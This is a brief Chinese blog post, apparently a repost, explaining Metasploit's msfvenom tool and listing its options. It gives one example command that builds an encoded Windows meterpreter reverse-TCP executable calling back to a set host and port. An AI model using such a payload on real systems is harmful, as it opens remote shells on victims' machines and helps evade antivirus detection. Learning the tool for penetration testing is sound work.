metasploit之msfvenom功能
2020-12-13 16:07
标签:http os for c 一个 io 有木有常常需要把msfpayload获得的内容通过R命令导入管道输出至msfencode中进行编码,有木有觉得这一切很麻烦, metasploit的开发人员早就想到了。msfvenom是msfpayload和msfencode的结合体,用起来更方便了。 Usage:msfvenom [options] example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -e x86/shikata_ga_nai -b ‘0x00‘ -i 5 -f exe >test.exe 同时分享一个比较好的metasploit学习网站: http://www.offensive-security.com/metasploit-unleashed/Main_Page 免费学习,捐赠的资金用于资助贫困地区的教育。 metasploit之msfvenom功能,搜素材,soscw.com metasploit之msfvenom功能 标签:http os for c 一个 io 原文地址:http://www.cnblogs.com/Chorder/p/3797776.html
Options:
-p, --payload
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled
-f, --format
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use:
--platform
-s, --space
-b, --bad-chars The list of characters to avoid example: ‘\x00\xff‘
-i, --iterations
-c, --add-code
-x, --template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload‘s standard options
-h, --help Show this message
--help-formats List available formats